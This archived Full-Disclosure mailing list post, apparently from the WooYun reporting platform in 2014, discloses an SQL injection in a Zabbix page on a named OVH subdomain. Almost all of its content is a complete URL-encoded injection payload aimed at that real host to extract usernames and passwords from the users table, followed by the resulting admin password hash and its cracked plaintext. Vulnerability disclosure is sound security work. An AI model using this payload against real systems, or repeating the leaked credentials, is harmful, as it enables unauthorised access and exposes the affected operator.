lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Wed, 8 Jan 2014 00:33:04 +0800
From: "En.wooyun.org" <help.en@...yun.org>
To: full-disclosure@...ts.grok.org.uk
Subject: [Wooyun] OVH a subsite Zabbix Sql injection

*Abstract:*
OVH a subsite Zabbix Sql injection.

*Details:*
url:
http://r29901.ovh.net/httpmon.php?applications=2%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%28select%20concat%28cast%28concat%28alias,0x7e,passwd,0x7e%29%20as%20char%29,0x7e%29%29%20from%20zabbix.users%20LIMIT%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29

*Proofs of concept:*
[image: 内嵌图片 1]
Admin~ca8949b7aab61bd78b2ebe12f08655fd
ca8949b7aab61bd78b2ebe12f08655fd=xerox55

*From:*
http://en.wooyun.org/bugs/wooyun-2013-042
-- 

WooYun, an Open and Free Vulnerability Reporting Platform

For more information, please visit *http://en.wooyun.org/about.php
<http://en.wooyun.org/about.php?>*

Content of type "text/html" skipped

Download attachment "212228485f1a1fa595e7c110a1e80a44aed824c6.jpg" of type "image/jpeg" (177944 bytes)

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ